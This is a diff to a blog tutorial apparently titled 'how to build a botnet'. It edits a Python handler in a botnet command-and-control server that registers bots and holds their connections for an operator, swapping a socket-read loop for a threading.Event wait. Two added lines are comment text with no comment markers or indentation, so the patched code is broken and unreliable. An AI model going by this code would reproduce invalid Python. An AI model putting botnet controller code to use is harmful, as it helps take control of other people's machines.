xransum/blog/_posts/2023-06-17-how-to-build-a-botnet.md

 def handle_bot(conn, addr, bot_id):
     print(f"[+] Bot {bot_id} registered from {addr[0]}:{addr[1]}")
+    gone = threading.Event()
     with bot_lock:
-        bots[bot_id] = {"conn": conn, "addr": addr}
+        bots[bot_id] = {"conn": conn, "addr": addr, "gone": gone}
     try:
-        # Bot sits idle -- the operator handler talks to it directly.
+        # Bot sits idle -- the operator handler talks to it directly via
-        # We just need to keep the connection alive and detect disconnect.
-        conn.settimeout(None)
-        while True:
+        # send_msg/recv_msg.
+We must NOT read from the socket here because
-            # A zero-length recv means the bot disconnected.
+        # a concurrent recv would race with the operator handler and corrupt
-            data = conn.recv(1)
-            if not data:
-                break
+        # the length-prefixed framing.
+Instead we block on a threading.Event
+        # that the operator handler sets when it detects the bot has gone away.
+        gone.wait()
     except Exception:
         pass
     finally: